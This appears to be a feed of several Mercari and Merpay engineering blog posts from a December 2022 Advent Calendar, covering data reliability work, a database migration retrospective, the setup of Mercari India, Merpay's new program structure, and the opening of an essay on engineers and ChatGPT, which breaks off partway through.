Before Mercari US DRE team was formed, each of the Data Engineers was responsible for developing data pipelines (the automation of extracting, transforming and loading of data) along with managing the infrastructure, security, monitoring, and support across the entire portfolio. Without a dedicated focus to address all the operational responsibilities of managing data infrastructure, there were many challenges to reach the level of excellence needed to provide the level of support required by the business. Now with a dedicated team focused on Data Reliability, specialized data engineers can work on what they do best without worrying about all the operational and technical maintenance surrounding data pipelines.

Out the gate, the Mercari DRE team had four core objectives to expand the capabilities of the Data Engineering organizations

Onboard and Establish Level 1 Support for Data Pipelines
Modernize Data Pipeline Infrastructure
Proliferate Data Operations, and Monitoring Practices
Secure access to Customer Data

We are proud of the accomplishments we made this year on these key areas and will outline the details below.

1 – Onboard and Establish Level 1 Support for Data Pipelines

USDE is responsible for many core processes that stream raw data from the application databases, and make them available in a comprehensive data warehouse for Mercari employees to gain access for their projects. To ensure that an appropriate level of focus and support is being provided to the pipelines, DRE is the first line of defense for these core business. DRE has set up a system of onboarding, training and recording knowledge transfer in a detailed catalog to ensure developers in USDE are fully aware of how to support our complicated systems. DRE will be the first to be alerted when there are issues with the pipeline or data anomalies in the end dataset, and will troubleshoot and triage to quickly lead to resolution.

2 – Modernize Data Pipeline Infrastructure

Technology evolves at a rapid rate, and a key responsibility of engineers is to keep up with the latest tools so that the experience of developers and end users can improve over time. One new service we are excited about in Google Cloud is GCP Data Fusion which is a fully managed UI based data pipeline tool that natively integrates across GCP products, and enables fast ingestion of large datasets thanks to DataProc (Apache Spark) running behind the scenes.

DRE focused on creating a dedicated instance in the USDE space to enable the development of other systems such as a Data Quality Framework, Data Backfill Processes, as well as simpler ways to expose Cloud Spanner Instances into Big Query. By adopting Data Fusion in GCP we believe USDE can create more reliable data processes as well as faster recovery time when there are issues in the data.

3 – Proliferate Data Operations, and Monitoring Practices

Managing hundreds of production tables is extremely challenging, especially when you have a small team actively working on many projects and cannot provide the level of monitoring needed to each dataset. To address this, one of the most exciting tools we have adopted this year is MonteCarlo Data, which is a SaaS provider that monitors cloud data warehouses for anomalies in datasets utilizing machine learning detection.

By setting up MonteCarlo within our data warehouses, the service automatically creates monitors for all tables to create a baseline for expected behavior and alerts when there are anomalies related to updates, row counts, and schema changes. This saves countless hours of manual effort required to achieve this level of observability.

These ML driven monitors have already saved many impactful incidents from occurring thanks to the quick alerts by MonteCarlo. One example includes anomaly detections on key pipelines where odd distributions of field data that were caused by bugs in our app. Multiple data issues in our data warehouse were also avoided by having these monitors to detect unusual data update schedules and table row counts that would not typically be captured by simple monitors waiting for errors and failures. If it were not for these alerts, it may have taken many hours before an end user realized an issue to report back to the engineers. We are able to resolve issues before our stakeholders can experience an issue.

DRE streamlined the alerts from MonteCarlo, and created custom monitors to focus on the datasets of interest. With greater observability and reduced noise of automatic alerts, the USDE organization can better react to the incidents of impact to quickly recover data outages. US DRE is integrating MonteCarlo, GCP Monitoring, Slack and PagerDuty to mature the support structure around our data.

4 -Secure Access to Customer data

As stewards of data for Mercari, the DRE team takes the security of access to datasets seriously. Our customers trust Mercari with their identity and sensitive data, and it is our responsibility to provide the highest standards to meet that expectations. One of our key accomplishments is providing governance and systems to help keep data access in compliance to regulations and auditing around PII access. All PII fields in our GCP data warehouse are protected under specific tags so that only Mercari employees with approved usage can access.

This allows developers and analysts access to datasets to accomplish their project goals, while at the same time withholding access to very specific field level access, thereby protecting our customers. The DRE team has also partnered with the Compliance team to thoroughly review PII access requests so that data is managed responsibly and true to the approved management of the information. We continue to streamline these processes to improve the developer experience to access the data they need while simultaneously keeping data protected from exposure.

Summary

We in Mercari USDE Data Reliability Engineering team are proud of the accomplishments we made this year having only formed 5 months ago. We rallied around these 4 goals and believe that the data infrastructure is in better condition to support our products and data team to accomplish more in 2023. There are still many opportunities for Data Reliability Engineering practices to mature here at Mercari, and our team is excited to take on the challenges head on.

Thank you all for taking the time to take an interest in our journey! We enjoy talking about our experiences and sharing them with the tech community. If you are interested to learn more, please feel free to reach out to the Data Reliability Engineering team: Takako Ohshima, Xi Zhou, Daniel Morita Lameyer, Mark Robinson

Up next for our Advent Calendar Blogpost, stay tuned for an exciting article by Sahil Khokhar!

Moving to cloud: How to do Migrations the wrong way

Sun, 18 Dec 2022 11:00:41 GMT

This post is for Day 18 of Mercari Advent Calendar 2022, brought to you by @kaustubh from the Metadata Ecosystem team.

My team recently moved databases from local files in the codebase to an online Database. It took longer than expected but with good reason.

Wait, did you say local files?
One of the services my team maintains started as a proof-of-concept, focusing on a few e-commerce categories only. But unfortunately, we suffered from success. That meant we needed to expand our Metadata dataset to a large number of categories rather quickly.

Since serving the data had higher priority, and new data was added only once a month, data addition was not really a mission-critical feature to have. Until we struggled under the massive weight of positive results, and needed to effectively 10x our data size and 10x our traffic, at the same time.

(Cover photo by Chris Briggs on Unsplash)

Data addition as it was in the past

Mercari is a C2C marketplace, meaning there could be multiple listings of iPhones. A lot of details about these iPhones can be different (price, description) but some of the details will always have a finite set of options (like brand, color, iphone storage size), which we call metadata. My team manages & serves such finite sets and details.

You can see everything in the Mercari system that our team affects here.

Any time a new brand or a product is launched in the market, we should have that new brand or product details available as metadata.We had a few bots and automations in place for the new data addition workflow.

New data was aggregated manually (needs manual checks before addition)
The product manager prepared the data in a specified sheet format.
A slack bot first validates this spreadsheet, and then converts the spreadsheet into files to be added to the code repository as a PR.
An engineer approves the PR, and deploys it to the dev environment.
QA for sanity checks
Engineer releases it to production

Data addition workflow in the past

Why don’t we leave it at that ?

The workflow can be stopped at any of these points:

Data validation required new rules, pretty much every time we added data.
If data isn’t the issue, the PM is blocked by both engineer approval and dev release to start the QA the new data.
If dev QA fails? Start over.

The first point may seem a bit odd, but in reality similar brand names exist with just the slightest of differences so that each of them can be unique. For example, there may already be a brand named “Brand” in the dataset, but if a new brand called "Brãnd" is launched, we’ll have to add an exception to our validation rules to allow this ã.

The above points would not have been a concern if we’re adding data in just two batches every quarter. But things changed. We progressed further along the adoption curve, and more teams wanted additional data. Which meant data addition was going to happen every 2-3 weeks. So the local storage solution wasn’t gonna cut it.

The task at hand

What we wanted to achieve:

Product Manager should be able to add data
PM should be able to roll it out to production (without engineer intervention)
The service should work with no performance drops, latency changes within bounds.

So our proposed solution was this:

Build a bare bones UI that PMs can use to manipulate data.
- This UI could be used by external collaborators, because a permalink is better than a SQL query.
Update the service to call an online DB, instead of local variables. (that was not a db)

We figured the UI can directly manipulate dev data, and once QA is done, there would be a big red button to sync dev and prod data. The team decided the functional requirements, and solidified the solution with a design doc. The team arrived on a consensus and the PM also seemed happy about it

On the backend, our service performs the following tasks:

Validation
- Check whether we’re storing the right metadata for each item. This is important because certain metadata options might be disabled, or made temporarily unavailable.
Listing
- There are multiple sources for metadata for an item: the only one from users is when sellers add it for listing.
Worker
- Mercari uses PubSub for communicating between services / workers owned by different teams. This worker listened to listing events, and published to a few consumers.

These were the 3 tasks that we came up with: 3 tasks that 3 engineers can work on. Another engineer can work on the UI part.

Proposed Data addition workflow

Sounds straightforward, right ? Few sprints and we should be done, or at least this is what we sold to our Engineering Manager.

Hiccups before start

Anything that can go wrong will go wrong – Murphy.

Plug and Pause: Our initial plan was to write the UI / backend for UI in Node.js, because another team had already written what we wanted in JS. The problem with that approach was:

The UI was too tightly coupled with the other team’s architecture, making it harder to adapt.
The UI had different use cases than what we were looking for.
Our codebase was in go & python only, and just 1-2 members in the team were comfortable with JS.

Rations & responsibilities: Our team was a backend team, we didn’t have any web engineers in our team, which meant that the UI must be maintained by people who were not too familiar with frontend development.

At the time, Mercari was working on a major rewrite so we weren’t going to get any web-side help for some time. This becomes relevant later.

Regardless of the challenges we knew upfront, the team had a positive outlook and we were pumped to roll this out.

Engineers at work

Photo by Mark König on Unsplash

We had a new data schema ready. Most of the code was written, reviewed, and ready to release. We expected a smooth rollout.

Put a pin in it

As mentioned above, we planned to release the 3 major chunks of rewrite as 3 tasks. The first one (validation) was already in production, working well. As our planned release date approached, a new complication showed up. The company level rewrite was to go live in the coming days. To truly assess if the rewrite was effective, all releases were put on hold for some time. That meant our plans for gradual releases had to be replaced with a one-shot release.

One-shot release

This wasn’t something we wanted to do, but numbers were crunched, traffic was estimated, and the release tag cut. To start off, the migrated release seemed to handle traffic well. But as peak traffic arrived, we were greeted by pagerduty alerts. – an increasing amount of requests were timed out.

Just sprinkle some replicas on it

For the data set we had, we predicted the db had enough computing resources to serve at peak traffic. That was not the case. During peak traffic, requests kept getting timed out by the DB. We decided to add three large replicas, and scale them down as required – but that was not sufficient either.

Cache me outside

We’d predicted we’d need a cache to improve our latency, so this was in our plan anyway – but as an improvement task. We started off with an external cache that all server and worker pods would access. We started with using an external cache, however it would turn out to be more complicated than a quick in-memory cache for each service pod. After spending an uncomfortably long period of time on implementing a single external cache, we instead implemented a rather quick in-memory cache that would get the job done.

Trust nobody – not even your own SQL code

Before we implemented the cache, the team agreed that the cache should not be a system-critical component of the architecture; it should be an enhancement. So we beefed up our DBs and replicas and did a last hail-mary release before releasing the cache. As traffic came in, so did the pagerduty alerts but the DB and replicas were not showing any problems.
After some service profiling, our Tech lead led us to glorious redemption with a few optimized SQL calls. The cause: We initially started with the simplest SQL query, and added preloading with the expectation it would speed up response time. It was doing the opposite in a few cases, so we removed preloading in a few non-service-critical queries, and that stabilized the performance. The cache further helped improve costs and performance, and we all lived happily ever after.

Conclusion: Making better mistakes

Photo by Motoki Tonn on Unsplash

I organized a KPT retrospective for the project, to understand what we could have done better.

Under-promise, over-deliver

Communicating with the end users with just a design doc is not enough. Sometimes they don’t know what features they want unless they see actual mockups of the final product – then it’s easier for them to point out what they want or what they don’t want. As a result we had to continuously improve our data manipulation UI when PMs actually started using it, because they were not aware of some details.

Track everything

Before the release, we had 30 monitors and 6 observability dashboards. Now we have 40 monitors and 8 dashboards. For a project like this, a few metrics that we should have tracked from the beginning were:

DB query time (the time to actually perform the query) and DB response time (the time between receiving the request and sending a response)
Avg CPU, Memory, numbers of containers running – for the DB, not just the service
Make better calculations – Back-of-the-envelope calculations should be restricted to non production releases, probably involving the architects and platform team to understand what metrics you need to calculate.

Granular releases

This was something we wanted to do from the start, but could not due to external factors. We should have not tried to release everything at once. We also should have questioned and reviewed our own code more, instead of having our releases reveal them to us.

Make your mistakes public

We intend to share our findings at an org-level internally so that other teams can save a lot of precious time, money, resources, ~sleep~ that we overspent.

One of the things I truly appreciate about being at Mercari is the ability to own up to your mistakes and being able to write this kind of an article. The environment is friendly, yet nurturing, lenient yet accountable. If that does not sound like your current workplace,that can change. Here’s my post from our 2021 advent calendar about career change, and here is our job portal. Come join us, we have snacks!

Tomorrow’s article will be presented by the US DRE team. Please look forward to it!

Mercari India : The story of Mercari Group’s first ever Global Center of Excellence

Sat, 17 Dec 2022 11:00:55 GMT

This post is for Day 17th of Mercari Advent Calendar 2022, brought to you by Mohan Bhatkar, Head of Engineering for Global Center of Excellence.

Introduction

Hello Everyone.
I am Mohan Bhatkar, Head of Engineering for Mercari Group’s first ever Global center of excellence. Through this article let me share with you about our endeavor and some of my personal experiences to establish Mercari Group’s first ever Global Center of Excellence in Bengaluru, India in 2022. I hope this story of our exciting journey could enlighten our background efforts and could help any organization to learn more about establishing a Global center of excellence.

Background

The need to establish a Global Center of Excellence in the first place

It is estimated that by 2030, the Japanese tech market will have a talent deficit of roughly 790,000 people. As the demand for tech soars due to the impact of the COVID-19 pandemic, moving forward, the efforts of diverse technical specialists, including talent from outside of Japan, will become increasingly important.

Since Mercari’s establishment in 2013, under the banner of its mission to Create value in a global marketplace where anyone can buy & sell, the company has endeavored to build a globally competitive team that respects the diverse experiences and perspectives of each individual.

From 2017, Mercari began seriously pursuing overseas recruiting for its Japan headquarter. We have successfully recruited and relocated global talent from all over the world. As a result of these overseas hiring efforts, at present, roughly 50% of the engineering organization based in Mercari’s Tokyo office is composed of non-Japanese engineers, which is also an indicator of how rapidly diversity is progressing at the company.

On the other hand, in addition to its core businesses, namely the Mercari app, Mercari US, and the mobile payment service Merpay, Mercari has also started accelerating its development of new businesses—last year, it established its e-commerce platform Mercari Shops, its crypto asset and blockchain business Mercoin, Inc., and its logistics service Merlogi, Inc. In this way, Mercari is further investing in top-tier tech talent in pursuit of its company mission. Furthermore, in order for Mercari to grow into a global tech company with a view to further global expansion in the future, it is essential to create an organization that incorporates diverse perspectives.

With all these perspectives in mind, the engineering office team under leadership of our CTO, Ken Wakasa investigated strategies to expand our product development capabilities in 2021. By December, 2021 we decided to establish a Global Center of Excellence in India.

Why did we choose to establish ourselves in India ?

India has a large pool of highly skilled technical personnel, with approximately 1.5 million engineering students graduating every year. With regard to India’s tech talent in particular, the Japan-India Summit Joint Statement released at the 14th Japan-India Annual Summit also expresses the hope that Japanese companies will strengthen the digital economy by employing and collaborating with India’s highly skilled technological human resources. As such, Mercari has been actively recruiting from India, including hiring 29 graduates from the various Indian Institutes of Technology in 2018 alone.

Many global tech companies such as Microsoft, Google, and Amazon have established development centers in Bengaluru which is known as Silicon Valley of India. Many local unicorns such as Flipcart, Razorpay, and Oyo were born and are headquartered in Bengaluru. According to a NASSCOM report, 42 new Indian companies have become unicorns by 2021, a rapid growth of 3.5 times in just one year.

In our Tokyo office we have members coming from India including myself and as an organization Mercari has also learnt a lot about cultural aspects of India in the past 4 years. Given that India has evolved very much in terms of tech talent over the last one decade and Mercari has cultural and organizational understanding of such tech talent we decided to establish our first ever Global Center of Excellence in Bengaluru, India.

Birth of Project Biryani

I vividly remember our CTO, Ken Wakasa did very first discussion with me last December about establishing Mercari India. No detailed project plan, project members were decided at that time and he asked me whether I would like to lead engineering efforts in this very challenging project. I was very thrilled to hear about this and couldn’t resist myself saying a LOUD INNER YES for this project. I was supposed to take a relaxed year end holiday but this news was so exciting that it kept me thinking about next year’s project plan and execution details.

By the beginning of 2022 I was already having a brief draft plan of establishing a global center of excellence by doing various research locally in India and reaching out to several consultancies which can help to bootstrap. Soon we decided core members of the project across different functions such as engineering, HR, corporate, branding, management strategy, etc. With all members we refined our 2022 high level roadmap as below and called this project as Project Biryani named after one of the most popular Indian dishes.

Core objective of Mercari India

For a project of this scale it is paramount to define a core objective in order to not get stretched in various directions. If we have a clear objective then it is easy to share across the organization of Mercari’s scale and ensure the same understanding among very diverse members. So we set the core objective of Mercari India as below.

Spearhead the expansion of Mercari Group’s product development capability through global engineering excellence.

Strategy of Mercari India

In order to achieve the core objective of Mercari India our entire strategy was focussed on Team First Thinking. The idea of treating people as resources is an old concept now. In Mercari India our objective was never to get as many resources as possible to enhance our product development capability. Our end goal is to build self-sufficient teams to deliver customer/business value and for a team to be self-sufficient, it should have all the members with needed expertise such as Software engineer, Product manager, Engineering manager, QA, etc..

The team is the most effective means of software delivery, not individuals.

With Team First Thinking strategy I started to plan initial teams for FY2023 (July, 2022 – June, 2023) with different engineering and product leaders across Mercari Group. Although everyone was excited about Project Biryani, when it came to creating initial team plans there were many open questions on hiring and onboarding, management strategy of India members, resolving barriers of time zone differences, ensuring compliance and regulations the same as Japan region, etc. I clarified these open questions one by one and finally we came up with a 1 year team building plan in Mercari India as below.

Story of 1 year execution so far

Establishing a global center of excellence comes with many difficulties, since you are faced with making both major and minor decisions in a very rapid environment, and because you run into many firsts.

Many members from various teams in Mercari were involved in this project to make it a reality—the project’s Slack channel has over 350 members! Every member in this project has worked relentlessly and below are some of the stories which will share challenges we faced and how we overcame them.

Initial setup with indian consulting partner

To execute our plan we needed a strong local partner who can help in all initial setup to achieve our core objective. Through my early research I found few options for such consulting partners because global center of excellence is a very known term in India and there are many consulting firms which support foreign based companies to set up their product development bases in India. Out of all options we chose the best consulting partner given their strong record of setting up Global Center of Excellence for many international firms including japan based firms. By the end of January, 2022 we already started discussing detailed execution plans along with contract terms.

In order to fix the initial setup, our core team including myself visited our Indian consulting partner in Bengaluru for 2-3 weeks in March, 2022. We have conducted detailed kick off sessions on every area such as legal entity incorporation, finance, office setup, hiring management, branding, HR, etc.

Challenges and resolution
In order to bootstrap Mercari India our consulting partner became a very integral part of every function of the organization and for that we had to give them some access to our systems and using our systems they will handle personal information of candidates as well as employees after onboarding. Mercari follows very rigorous policies and regulations when outsourcing personal information handling to external partners, especially partners outside of Japan.

We wanted to launch a Global center of excellence quickly but at the same time could not compromise on any of our policies and regulations. We had several discussions with our security team, privacy team, IT and governance team and shared a mitigation plan to our executive team. We decided to provide Mercari laptops with the same security measures implemented as Japan to all partner members involved in the project and our IT team ensured to help us in the execution. On top of signing an NDA between two companies we also signed a personal information handling agreement to avoid unnecessary risks in the future.

Contract with our partner got a bit delayed because compliance with all policies and regulations took some time. Even with this we had to make sure that partner members have all needed system access to start our hiring operations within 1 week time. Consulting partners proactively helped us to procure laptops from local IT vendors and we got them ready with cooperation from our IT team in tokyo. We issued Mercari accounts with access to needed systems and communication channels to our partner members and onboarded them with a hiring operation which was our next big challenge.

Onboarding the very first member

Soon after our initial setup in March, 2022 we set a big target to onboard the very first member by June, 2022 and to do this we just had 2.5 months left to get all the functions ready. All function leaders of engineering, talent acquisition, HR, corporate, office setup, branding started working in parallel with many members of Mercari to get things done.

While working on a lot of things in parallel we decided to do a press release about establishing a Center of Excellence in India in the month of May and open India career page to start hiring for our top priority positions. Our branding leader worked hard to get our careers page ready in the background. Based on the team building plan we set up the hiring process and got our hiring positions ready to be published. Our Head of Corporate led all the board approvals needed to establish a new foreign subsidiary in India and we also ensured that all our HR functions are on track.

May 11th, 2022 was the day of the press release and everyone was very excited to share the news to the entire world and begin the first step of hiring in India. I was given an opportunity to do the media briefing as Head of Engineering and as a foreigner to do a media briefing in japanese it felt so exciting but nervous at the same time. Just after the press release we opened our career page and our official journey to establish a global center of excellence in India started from this very day.

Legal entity setup

Legal entity is one of the most important roadblock to hiring someone in India under regulations of the Ministry of Corporate Affairs. Our Head of Corporate led the entire setup to establish an Indian Private Limited entity as a subsidiary of Mercari Inc. Japan. We had to go through many hurdles as below to finally get it done on 23rd June, 2022.

Acquiring physical office
Registering a legal entity in India requires an office address and in order to have a beautiful workplace for our India employees we decided to acquire WeWork managed office space. We did an extensive office site research during our visit in March and finally shortlisted Embassy Golf Link Tech Park as it was located in central Bengaluru and traffic situation was better compared to other big tech parks in Bengaluru. When we visited WeWork in Embassy Golf Link Park they told us that there are no vacancies in their existing office but luckily they were constructing another office in the same tech park by June. We had to hurry in making a decision because even new WeWork office space was getting reserved by different companies and finally with everyone’s efforts and support from our partner we finished the contract with WeWork and reserved our office space in the new Sunriver building of Embassy Golf Link Park.

Entity name reservation
After acquiring the official address for our entity the next step was to get the name reservation done. For name reservation we can apply for 3 choices and those names should not be used by any other companies before. We wanted to have Mercari India as the starting name because it shares the same brand name of Mercari Group and hence applied for 3 names starting with Mercari India. Unfortunately the ministry of corporate affairs rejected all our names in the first attempt. In a way this was a big blow to us and we came up again with some alternatives which included Mercari and India in the wordings. In our 2nd attempt we got the name approved as Mercari Software Technologies India Private Limited.

Entity incorporation
After entity name approval in May, 2022 we submitted for entity incorporation as we were about to hire a few candidates in the hiring pipeline. Even though we submitted well in advance, for several days we did not get approval and we were facing a very difficult situation where we need to offer a candidate but we don’t even have a legal entity in place. With the help of our local partner we escalated this matter to the ministry of corporate affairs a few times and it seemed the registration site was facing several technical issues during those days. Finally after several follow ups our entity registration got approved on 23rd June, 2022 as Mercari Software Technologies India Private Limited. Check our press release.

Soon after entity incorporation we ensured to complete other corporate functions such as capital injection from the parent company, setting up payroll for new employees, ensuring finance related compliance and the corporate area was ready to onboard new members.

Creating HR foundations

While we were tackling legal entity and corporate function hurdles our HR leader for Mercari India was setting up all HR foundations in parallel. We had to ensure that all HR foundations such as statutory HR policies, compensation & benefit benchmarking, offer approval process, new member onboarding, employee personal data management systems, organization management systems, etc. were ready by June, 2022.

Setting up HR foundations in a completely new country of India had its unique challenges. First of all we did not know many country laws and regulations. HR policy making had to consider local market conditions to be strategic and competitive in the India market. At the same time we wanted to ensure the same values and culture of Mercari Group in our India organization as well.

Our HR leader along with experts from our local partner built HR foundations based on Mercari Group’s Culture Doc. Within a short span of 2 months we ensured that Mercari India has one of the best Benefits and Perks, flexible workstyle, relocation and work from home support, etc.

With our corporate and HR foundations ready by the end of June we got the good news that our first member has accepted the offer and will be joining on 30th June. Everyone who worked so hard in the past 3 months to onboard our first member was very ecstatic.
That’s the story of onboarding our first member, Anandh!

Hiring Hiring Hiring !

After onboarding our very first member we wanted to ramp up our hiring but we were faced with the tough reality of the Bengaluru market which we had been hearing from so many organizations in the past few months.The tech talent pool is ample but at the same time all the organizations are trying to get the best talent onboard. Right from the airport to multiple road crossings we can see companies putting up hiring promotions banners in Bengaluru. That’s the reality of hiring in Bengaluru!

When we started hiring in India we basically used the same process and speed as we were using in Japan. But we soon realized that the Indian market is very dynamic and competitive given that every good candidate has multiple offers in hand and they have a variety of choices to go for. To potential candidates Mercari was just another company because many candidates in India still are not aware about Mercari and its culture.

In the initial 3 months from May to July, 2022 we tried to optimize our hiring process but that was not enough as our hiring and onboarding results were very slow. We investigated some of the reasons as :

Long time to hire
Less brand awareness
Less personalized candidate engagement program
And honestly a very competitive market in terms of compensation and benefits

Given the candidate centric market, we started to enhance our hiring process by taking multiple initiatives as below.

Optimized the hiring process and feedback loop from interviewers to reduce time to hire
Brand awareness using online and offline tech events
- Online meetup event to share about teams in Mercari India
- Golang Banglore meetup hosted in Mercari India office
Regular sharing to Indian tech community using our linkedin forum
- Mercari India linkedin page has more than 2000 followers within just 6 months. (Thanks to our branding leader, Kayo san for this.)
Started candidate engagement program during hiring process to align with their personal motivation and career aspirations

With all above initiatives we could see some progress by September 2022, as we onboarded our first team in Mercari India. But still we wanted to accelerate our hiring and take some bold steps to make drastic progress in building the teams. That’s when we came up with the idea of conducting Hiring Drive in which we will complete the entire selection process of as many candidates as possible on a single day.

We decided to conduct the hiring drive on 19th November and started preparations from 1st week of November. Within 3 weeks we shortlisted more than 30 candidates to do the interviews on the drive day and prepared around 20 interviewers to conduct all the interviews within 8 hours duration in an online and offline mode.Our recruitment team worked relentlessly to get this done.

With so much advance preparations and a great effort by all the team, we were able to pull off this hiring drive successfully. To summarize the day it was 8 long hours, 30 candidates, 18 interviewers, 56 interviews, 8 final offers all in a hybrid setup!

Office setup and cultural integration

As we were gradually onboarding new members, it was important for us to set up a beautiful workplace for them and ensure a good cultural integration between our Japan office and India office.

Our WeWork managed office at the very beginning was very basic in design and facilities and we wanted to add a true Mercari feeling inside our India office. Initially we wanted to set up an office in cooperation with local vendors but it took some time to decide on a vendor and the estimation from vendors was taking too long. We wanted to make our workplace attractive enough so that our members feel that they belong to a good organization.

Our program manager along with the engineering office team led the office setup and we decided to do it ourselves rather than relying on any vendor. During our visit in October, 2022 Mercari members bought necessary furniture and decorative items from various stores and set up almost everything by ourselves. Even our new members helped us in setting the office space and that shows a true spirit of All for one in Mercari.

After we finished our office setup we had the first Diwali celebration at our office in October and that was one of the most exciting and beautiful events for everyone in Mercari India. Please refer to event detail article.

For cultural integration we regularly conduct events such as Weekly Chai Party Club and monthly TGIF. Through such events we get to interact with all India members and get to know their thought process in making Mercari India together.

With all these efforts for the past 12 months by many Mercari members we are able to establish Mercari India but it is just a start and we have a long way to go in this journey. As of today below is a summary of our 1 year short journey and we are hoping to onboard remaining teams by early next year.

Future Challenges

2022 is just the beginning for Mercari India and to achieve our end goal of building self-sufficient teams to deliver customer/business value we have got a huge mountain to climb next year. As we are rapidly expanding every quarter we will come across many challenges of scaling the organization. Hiring best talent still remains a challenge but growing and nurturing members who have joined Mercari India is paramount to us because they will become the flag bearer to grow Mercari India henceforth.

If you want to be part of our exciting journey please apply through our career site.

Mercari India career site

Closing thoughts

I would like to extend my sincere thanks to every member of Mercari who has worked relentlessly to make Mercari India’s journey successful so far and taking a bold step of making Mercari a global tech company. Establishment of Mercari India resonates truly with our values- All for one, Go Bold, Be a Pro. Few hundred Mercari members have worked on this project in some or other capacity and I will not be able to mention names of everyone but kudos to the entire Mercari team and especially project Biryani core team (Wakasa san, Mikako san, Junichi san, Daisuke san, Kayo san and Jatin) to pull off this big initiative of Mercari Group.

As we close on the year 2022 I wish everyone happy holidays and a very happy new year 2023. I wish Mercari India and Mercari Group a huge success in the new year 2023. Tomorrow’s advent calendar article will be presented by @kaustubh. Please look forward to it !

Towards the new Product & Engineering at Merpay – 5th anniversary edition

Fri, 16 Dec 2022 12:00:58 GMT

This post is for Day 16 of Merpay Advent Calendar 2022, brought to you by @robertjerovsek from Merpay Engineering.

I have been performing many roles and done a few different things at Merpay, but for this time’s post I would like to talk a little bit about how we have decided our focus points until now, and how with some recent changes we want to improve our process as well.

History

Just last month, on November 20th of 2022, Merpay celebrated its 5th anniversary!

Wait a second though, wasn’t Merpay launched in February of 2019?

Yes!

Merpay was launched in February of 2019, but it takes time to actually launch something as big as Merpay, and to launch a financial service, you need to get the appropriate license, and conform to various regulatory requirements.

Along the way, we overcame various challenges and delivered an even better, and safer, experience for everyone using Mercari.

The most recent big feature we launched is the Mercard and point-back reward system!

We continue adding new features and offer new services, so with the advent of such a big new release, we believe it is now a chance to again focus our development efforts towards certain key areas we believe in.

Present

It’s not like we didn’t have focus until now, so let me first give a brief explanation about how we went about developing and prioritizing new features until now.

At Merpay we use an OKR (Objectives and Key Results) based approach for setting quarterly goals for the company, and in turn each team then defines their own OKRs that align with what we want to achieve as a company.

There are many articles about how to set good OKRs. A lot of it depends on the company/team, as well as individuals and their thoughts, so I won’t debate on what good OKRs are and whether we have good OKRs, but a company of sufficient size usually needs a system to focus on delivering results, whether that be by using OKRs or something else.

Not to go into too much detail, but usually we have 1 company objective with 3-4 Key Results, which represent the focus points of that quarter.

Below you can see an example of that, but not exactly what we actually have, to prevent disclosing too much information.

Objective: New Merpay for all Customers

KR: Mercard launch
KR: Mercard growth by X number at the end of December
KR: Smart Money numbers in-line with estimates
KR: Fraud kept in check

Usually most KRs have some KPIs/numbers associated with them which we track and report, as well as handle if not as expected.

Example of potential KPIs:

number of incidents by severity level
number of customers who activated their Mercard
amount of money lent
amount of damage due to fraud

You can see the numbers we actually disclose on our IR page.

But actually, we work on much more than just what’s shown in the OKRs!

There are many projects, some related to company OKRs, some more team-specific, or even just engineering-specific (e.g. QA optimization).

Until now, to decide project priorities that required cross-team collaborations, we had a big discussion once a quarter, for which every Product and Engineering Manager listed up the projects they are considering for the next quarter, and then the Director/VP/CxO decided the priorities after considering various factors.

As you can imagine, this was a rather daunting task.

While it made it possible for the company to show our focus, reality was that usually there was way more work than what could be shown in the OKRs, or even in the company-wide project list, and priorities were sometimes a bit hard to see overall.

What a person worked on was some combination of either being related to the company OKRs, the company-wide project list, the team’s backlog or roadmap items, and sometimes handling a request from another team that requires help, but didn’t come up during initial planning.

You can read a bit more about what we’ve been focusing on during the past year in the opening post made by our VPoE.

This system more or less worked, but we thought, could there be a better way to do this?

Future

With the launch of Mercard and the point-back rewards system, we are entering a new era for Merpay, so we considered now the best time to show our new focus and empower teams to do even better!

As such, we have decided to create a structure that focuses on certain key areas for Merpay.

We call this system the Program structure.

Each program has a certain focus area and owns the priorities, strategy/roadmap and KPIs for itself.

The main two people responsible for each program are the Product and Engineering Heads.

As you can imagine, based on the names, the Product Head is responsible for the product direction, while the Engineering Head is responsible for the engineering direction of each program.

While each Program and Engineering Head have certain ownership of their areas, overall strategy and focus alignment is still needed, between all the Heads, as well as the CPO and CTO to decide the overall direction.

Conclusion

This quarter we have been defining how the new structure will work and with January it will be our first quarter using the Program structure.

There may still be a few unknowns until we try it out, but as with everything, if you don’t try something, you will never learn and improve.

Hope you enjoyed reading a brief explanation about what we’re doing in terms of the Product & Engineering organization at Merpay.

The next article will be by shuuk. Look forward to it!

Do We Need Engineers in a ChatGPT World?

Fri, 16 Dec 2022 11:00:29 GMT

Hi everyone! My name is Darren, and I work on Data Engineering at Mercari. For today’s Advent Calendar post, we’ll take a break from technical details and talk about the broader tech landscape. And tomorrow, we’ll hear the origin story of Mercari India’s Center of Excellence. Stay tuned for more great posts!

The explosive release of ChatGPT has changed overnight what many thought possible with generative large language models (LLMs). All of a sudden, a chatbot is replacing the Google/Stack Overflow cycle, but rather than simply returning answers, it’s able to generate runnable code. What does this mean for our future as engineers? How should we philosophically approach the steady development of ever more sophisticated models that can write better code than humans? What is an “engineer”, anyway? Today we’ll discuss how to apply an engineering mindset to the AI future, which is coming whether we like it or not.

Unless you’ve been living under a rock, you have likely seen screenshots of ChatGPT conversations flooding the internet over the last few weeks. ChatGPT is a large language model from OpenAI productionized as a chatbot service, and it has been fine-tuned to follow instructions and produce more human-pleasing output than some of its predecessors such as base GPT-3. Although the details have not yet been released, it is likely based on prior work from InstructGPT, which used a GPT-3 base combined with reinforcement learning from human feedback (RLHF) to coax the model into producing better output.

Aside from being able to write sonnets, summarize complicated concepts, and perform other feats of LLM magic, ChatGPT was apparently also trained on a huge amount of computer code and is able to answer technical questions with real, actual code. Well, game over, right? Are we out of a job because ChatGPT can code? Not so fast.

A better way to approach this question is to think about what we engineers actually do. At its heart, engineering is about solving problems. As you level up in engineering, you solve bigger and bigger problems, and you combine the pieces of knowledge you’ve acquired along the way into larger and more complex programs and systems. Will there still be problems left to solve if a chatbot can write your unit tests? Is the unit of code that an LLM can produce the final output for a system, or is it a piece that fits into a larger whole? Even as models produce larger and more complicated outputs ranging from classes to modules to entire programs, those programs will fit into systems of their own, and engineers will be putting them together and solving the inevitable systems problems that arise.

